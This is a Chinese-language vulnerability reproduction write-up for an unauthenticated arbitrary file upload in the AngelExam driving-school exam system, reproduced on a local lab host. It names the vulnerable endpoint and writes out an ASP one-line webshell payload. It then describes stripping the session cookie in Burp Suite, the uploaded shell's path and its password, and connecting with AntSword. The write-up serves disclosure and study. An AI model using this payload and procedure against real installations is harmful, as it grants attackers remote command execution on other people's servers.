漏洞描述
Angel工作室(AngelExam)驾校考试存在文件上传漏洞,可直接获取webshell
漏洞影响
Angel工作室(AngelExam)驾校考试系统
FOFA
不提供
漏洞复现
该系统下载地址:
http://down.chinaz.com/soft/37169.htm
下载下来文件的视图展示:
项目结构定义方便我们更加好分析程序:
然后进入bin文件夹,为什么进入bin文件夹是因为从.net项目里面,bin文件夹主要是存放包含应用程序所需的,用于控件、组件或者需要引用的任何其他代码的可部署程序集。该目录中存在的任何.dll文 件将自动地链接到应用程序
漏洞定位:
对\AngelExam-v1.0\bin\AngelExam.dll文件进行反编译,在UploadController类的ExportFile函数的31行看到在上传文件时,后端没有做类型校验,导致可以上传asp文件
然后在该函数第64行,上传文件前没有进行session校验,导致可以未授权上传任意文件。
本地复现:
URL: http://192.168.1.26:83/Upload/ExportFile/
一句话木马:<%execute(request("pass"))%>
漏洞触发条件:
攻击者在题库管理中上传图片时,使用Burp Suite抓包,重放请求,上传asp一句话木马,用中国蚁剑连接,即可获得webshell。
验证过程:
本地搭建Angel工作室驾校考试系统,登录后台,在题库管理中,编辑题目,上传图片,使用Burp Suite拦截请求。
在Burp Suite中,拦截请求http://192.168.1.26:83/Upload/ExportFile/,去除cookie,上传asp一句话木马,<%execute(request("pass"))%>。
在后台/Upload/img路径下,发现已成功上传木马
使用中国蚁剑连接一句话木马,连接url:
http://192.168.1.26:83/Upload/img/asp.asp,密码:pass。连接成功,获得webshell。以上,可以证明系统存在未授权任意文件上传getshell
